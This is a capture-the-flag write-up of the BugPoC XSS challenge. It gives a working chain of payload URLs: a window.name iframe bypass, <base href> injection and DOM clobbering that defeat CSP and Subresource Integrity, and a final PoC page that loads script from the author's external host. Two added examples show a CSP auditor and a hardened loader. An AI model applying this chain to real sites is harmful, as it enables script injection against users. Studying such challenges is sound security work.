BugPoC XSS CTF CHALLENGE!

  1. Bypassing the Iframe restriction
  2. Handling CSP
  3. DOM Clobbering to XSS

Bypassing the Iframe restriction

frame.html only runs the challenge when it believes it is embedded, and that check reads window.name, so a page that sets window.name to "iframe" before navigating itself to the challenge satisfies it:

<script>
window.name = "iframe";
window.location = `https://wacky.buggywebsite.com/frame.html?param=BugPocXSS`;
</script>

Handling CSP

The challenge page ships a nonce-based policy with 'strict-dynamic', so only scripts inserted by the nonced loader may run:

content-security-policy: script-src 'nonce-rhgmumyjsmmg' 'strict-dynamic'; frame-src 'self'; object-src 'none';

Closing the <title> from the param value and injecting a <base href> re-roots the loader's relative script URL to a host the author controls, but the loader sets a Subresource Integrity attribute, so the substituted file is blocked:

https://wacky.buggywebsite.com/frame.html?param=</title><base href="https://akshanshjaiswal.com/"></base>

Failed to find a valid digest in the 'integrity' attribute for resource 'https://akshanshjaiswal.com/files/analytics/js/frame-analytics.js' with computed SHA-256 integrity 'RnJQK/rQg1gc8uIFVGW1ssXVg0r5PCN9kJSN7cYJglo='. The resource has been blocked.
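The policy above has no base-uri directive, which is what lets the injected <base href> take effect. The following is an added example (not part of the write-up or the challenge) that parses a CSP header value into a directive map and flags that gap together with two related ones; only the policy string is taken from the page, the audit rules are assumed.

```javascript
// Added example: a small CSP auditor. The CHALLENGE_CSP string is quoted from
// the challenge response header; everything else is assumed illustration.

const CHALLENGE_CSP =
  "script-src 'nonce-rhgmumyjsmmg' 'strict-dynamic'; frame-src 'self'; object-src 'none';";

// Split "name v1 v2; name v3" into Map { name -> [v1, v2] }. Directive names are
// case-insensitive and, as in the CSP spec, the first occurrence of a name wins.
function parseCsp(header) {
  const directives = new Map();
  for (const part of header.split(';')) {
    const tokens = part.trim().split(/\s+/).filter(Boolean);
    if (tokens.length === 0) continue;
    const name = tokens[0].toLowerCase();
    if (!directives.has(name)) directives.set(name, tokens.slice(1));
  }
  return directives;
}

// Returns the list of findings for a policy (empty when it passes these checks).
function auditCsp(header) {
  const d = parseCsp(header);
  const findings = [];
  const scriptSrc = d.get('script-src') || d.get('default-src') || [];
  const objectSrc = d.get('object-src') || d.get('default-src') || [];

  // Without base-uri, an injected <base href> re-roots every relative URL the
  // page resolves, including the script the nonced loader inserts.
  if (!d.has('base-uri')) {
    findings.push("base-uri missing: add base-uri 'none' (or 'self')");
  }
  // 'strict-dynamic' only grants trust when some script is already trusted by
  // nonce or hash; without one it does nothing useful.
  const hasNonceOrHash = scriptSrc.some((v) => /^'(nonce-|sha(256|384|512)-)/.test(v));
  if (scriptSrc.includes("'strict-dynamic'") && !hasNonceOrHash) {
    findings.push("'strict-dynamic' present without a nonce or hash source");
  }
  // Plugin content is another script-execution path; the challenge closes it.
  if (!objectSrc.includes("'none'")) {
    findings.push("object-src should be 'none'");
  }
  return findings;
}

// Usage: auditCsp(CHALLENGE_CSP) reports only the missing base-uri;
// appending " base-uri 'none'" to the policy clears it.
```

The parser deliberately keeps the first occurrence of a duplicated directive, which is how browsers treat repeated directive names, so a policy that appends a second `script-src` later in the header does not silently override the first one in this audit either.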

DOM Clobbering to XSS

The console prints the analytics loader's configuration. The loader takes it from window.fileIntegrity when that global already exists and only otherwise falls back to its own object:

window.fileIntegrity = window.fileIntegrity || {
  'rfc' : 'https://w3c.github.io/webappsec-subresource-integrity/',
  'algorithm' : 'sha256',
  'value' : 'unzMI6SuiNZmTzoOnV4Y9yqAjtSOgiIgyrKvumYRI6E=',
  'creationtime' : 1602687229
}

Two <base> elements with id="fileIntegrity" clobber that global (duplicate ids make window.fileIntegrity an HTMLCollection), so the fallback never runs:

https://wacky.buggywebsite.com/frame.html?param=</title><base id="fileIntegrity"></base><base id="fileIntegrity" integrity="test">

The script hosted on the author's server only needs to call:

window.parent.alert(document.domain)

and is served with a permissive CORS header (Apache configuration) so the loader can read the cross-origin response:

Header set Access-Control-Allow-Origin "*"

Giving the second <base> name="value" makes window.fileIntegrity.value resolve to that element instead of a digest string, so the integrity attribute the loader builds is malformed and the browser skips the SRI check, while the element's href re-roots the relative script URL to the author's host:

https://wacky.buggywebsite.com/frame.html?param=</title><base id="fileIntegrity"></base><base id="fileIntegrity" name="value" href="https://akshanshbug.000webhostapp.com">

Final PoC page:

<script>
window.name = "iframe";
window.location = `https://wacky.buggywebsite.com/frame.html?param=</title><base id="fileIntegrity"></base><base id="fileIntegrity" name="value" href="https://akshanshbug.000webhostapp.com">`;
</script>
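The root cause in the loader is the `window.fileIntegrity || {...}` pattern, which trusts whatever the document has already placed on `window`, plus an integrity attribute built by string concatenation that turns into malformed metadata under clobbering. The following is an added example, not the challenge's or the author's code: it models that loader beside a hardened variant that never reads configuration off `window` and refuses to emit anything that is not a well-formed SRI token. It runs in Node; the "window" object, the clobbered element and the absolute script URL are constructed stand-ins, and only the digest metadata is copied from the console output above.

```javascript
// Added example (not from the write-up). Models the clobber-prone loader pattern
// `window.fileIntegrity = window.fileIntegrity || {...}` against a hardened one.

// Well-formed SRI token: algorithm, dash, base64 digest.
const SRI_TOKEN = /^sha(256|384|512)-[A-Za-z0-9+/]+={0,2}$/;

// Metadata as printed in the challenge console (digest copied from the page).
const FILE_INTEGRITY = Object.freeze({
  rfc: 'https://w3c.github.io/webappsec-subresource-integrity/',
  algorithm: 'sha256',
  value: 'unzMI6SuiNZmTzoOnV4Y9yqAjtSOgiIgyrKvumYRI6E=',
  creationtime: 1602687229,
});

// Constructed stand-in for what two <base id="fileIntegrity"> elements (the
// second also carrying name="value") leave on window: an HTMLCollection whose
// named lookup `.value` returns an element. String() on an element that has no
// stringifier yields "[object HTMLBaseElement]", which the mock reproduces.
function makeClobberedWindow() {
  const baseEl = { tagName: 'BASE', toString: () => '[object HTMLBaseElement]' };
  const collection = [{ tagName: 'BASE' }, baseEl];
  collection.value = baseEl;
  return { fileIntegrity: collection };
}

// Clobber-prone: whatever the document already defined wins over the default.
function pickIntegrityUnsafe(win) {
  return win.fileIntegrity || FILE_INTEGRITY;
}

// Naive attribute construction by concatenation. With the clobbered config this
// yields "sha256-[object HTMLBaseElement]"; the SRI algorithm parses that as
// "no metadata" and the browser loads the script without any integrity check.
function integrityAttributeNaive(cfg) {
  return 'sha256-' + cfg.value;
}

// Hardened construction: require a plain object (an element or HTMLCollection
// has a different prototype) with own string fields forming a valid token.
// Returns null so the caller aborts the load instead of emitting bad metadata.
function integrityAttributeStrict(cfg) {
  if (cfg === null || typeof cfg !== 'object') return null;
  if (Object.getPrototypeOf(cfg) !== Object.prototype) return null;
  const own = (k) => Object.prototype.hasOwnProperty.call(cfg, k);
  if (!own('algorithm') || !own('value')) return null;
  if (typeof cfg.algorithm !== 'string' || typeof cfg.value !== 'string') return null;
  const token = `${cfg.algorithm}-${cfg.value}`;
  return SRI_TOKEN.test(token) ? token : null;
}

// Attributes the loader would put on the <script> element, or null to abort.
// Assumed absolute URL: a relative path would be re-rooted by an injected <base href>.
const SCRIPT_URL = 'https://wacky.buggywebsite.com/files/analytics/js/frame-analytics.js';

function scriptAttributes(win, strict) {
  // The hardened path reads the module-scoped constant, never `window`.
  const cfg = strict ? FILE_INTEGRITY : pickIntegrityUnsafe(win);
  const integrity = strict ? integrityAttributeStrict(cfg) : integrityAttributeNaive(cfg);
  if (integrity === null) return null;
  return { src: SCRIPT_URL, integrity, crossorigin: 'anonymous' };
}
```

Running `scriptAttributes(makeClobberedWindow(), false)` shows the naive loader handing the browser a malformed integrity value, while the strict path returns the genuine digest regardless of what the document put on `window`; the prototype check is the part that matters, since `typeof` alone cannot tell an HTMLCollection from a configuration object.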
